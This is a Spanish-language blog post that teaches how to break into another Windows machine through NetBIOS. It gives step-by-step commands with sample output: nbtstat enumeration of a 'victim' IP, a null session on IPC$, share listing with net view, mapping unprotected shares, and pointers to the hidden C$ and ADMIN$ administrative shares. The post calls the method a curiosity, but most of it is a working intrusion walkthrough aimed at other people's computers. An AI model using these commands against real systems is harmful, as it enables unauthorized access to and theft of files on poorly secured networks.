ENTRANDO POR NETBIOS

Posted by Star | Posted in | Posted on 17:37

Lo que se explica a continuación se puede utilizar desde un windows para atacar otro windows, aunque el ataque está pesado para NT sería muy similar si quisiéramos atacar un Windows 9x, pero no voy a entrar en muchos detalles, porque debido a que hoy en día existen maneras mas fáciles y rápidas de hacerlo, esta sección la he puesto sólo como curiosidad.

Una vez elegida la máquina a la que quieres entrar solo necesitas el Ms-Dos, o el Símbolo de Sistema, que para el caso es lo mismo, pues bien abres una ventana y escribes:


nbtstat -A 192.168.0.1


(si lo que conoces es
la IP de la victima)

nbtstat -a nombre_del_PC


(si conoces solo su nombre)


pueden ocurrir varias cosas, si recibes:


C:\WINDOWS>nbtstat -A 192.168.0.1


Host not found.


Pues queda claro que "not found" , o no está conectado, o no comparte archivos, o no existe (mira a ver si lo escribiste bien)


Si la respuesta es:


C:\WINDOWS>nbtstat -A 192.168.0.1


NetBIOS Remote Machine Name Table


Name Type Status


--------------------------------------------------------------


NAME <00> UNIQUE Registered


WORKGROUP <00> GROUP Registered


NAME <03> UNIQUE Registered


MAC Address = 00-00-00-00-00-00


Pues aunque parezca mejor, para el caso nos da igual, porque aunque si lo tiene instalado, no comparte nada.


Si recibimos:


C:\WINDOWS>nbtstat -A 192.168.0.1


NetBIOS Remote Machine Name Table


Name Type Status


----------------------------------------------------------------


NAME <00> UNIQUE Registered


WORKGROUP <00> GROUP Registered


NAME <03> UNIQUE Registered


NAME <20> UNIQUE Registered


WORKGROUP <1e> GROUP Registered


MAC Address = 00-00-00-00-00-00


En este si... la diferencia importante es el <20> que corresponde al "File Server Service" (Servicio servidor de archivos), solo los PC que tienen el <20> tienen archivos compartidos y accesibles.


El IPC$ (Inter-Process Communication) es un recurso compartido oculto estándar en una máquina NT , y es utilizado por el servidor para establecer comunicación con otros equipos.


Conectándose al IPC$ un intruso puede establecer una comunicación valida con el servidor NT. Conectándose como null, el intruso puede establecer dicha comunicación sin necesidad de introducir user:password.


Para ello se utiliza el siguiente comando:


c:\>net use \\[ip_de_la_víctima]\ipc$ "" /user:""


The command completed successfully.


Puedes ver qué comparte esa computadora sin necesidad de entrar, para ello utiliza el comando NET


C:\>net view \\192.168.0.1


recibirás algo así:


Shared resources at 192.168.0.1


Share name Type Used as Comment


----------------------------------------------------


NETLOGON Disk Logon server share


Test Disk


The command completed successfully.


Es posible que ocurra:


C:\>net view \\192.168.0.1


System error 5 has occurred.


Entonces primero tienes que establecer la "null session"


C:\>net use \\192.168.0.1\ipc$ "" /user:""


The command completed successfully.


Ahora el C:\>net view \\192.168.0.1


si funcionará


Para conectar a la carpeta compartida.


The command completed successfully.

Si escribes net use ahora, recibirás algo así:

Status Local Remote Network

-------------------------------------------------------------

OK X: \\123.123.123.123\test Microsoft

OK \\123.123.123.123\test Microsoft

The command completed successfully.

Para acceder directamente al PC solo tienes que:


*escribir en el explórer \\192.168.0.1


*INICIO / EJECUTAR y poner lo mismo \\192.168.0.1


*Botón derecho en Mis Sitios de Red > Buscar Equipos... y lo mismo 192.168.0.1


*En una ventana de símbolo de sistema escribir:


C:\>net use x: \\192.168.0.1\test


y después


C:\>dir x:


Este ataque solo funcionará si la carpeta compartida no tiene pasword.


Recuerda que un intruso no está limitado a los recursos compartidos que aparecen con el net view.


Un intruso que conozca NT sabe que existen otros recursos compartidos ocultos para uso administrativo. Por defecto NT


crea el IPC$ y otro por cada partición (por ejemplo una máquina que tiene C, D, y E tendrá sus correspondientes C$, D$, y E$).


También hay un ADMIN$ que pertenece a la ruta donde fue instalado el NT (por ejemplo si instalaste NT en C:\winnt, entonces ADMIN$ apunta exactamente a esa parte del disco).

Comments (0)

Publicar un comentario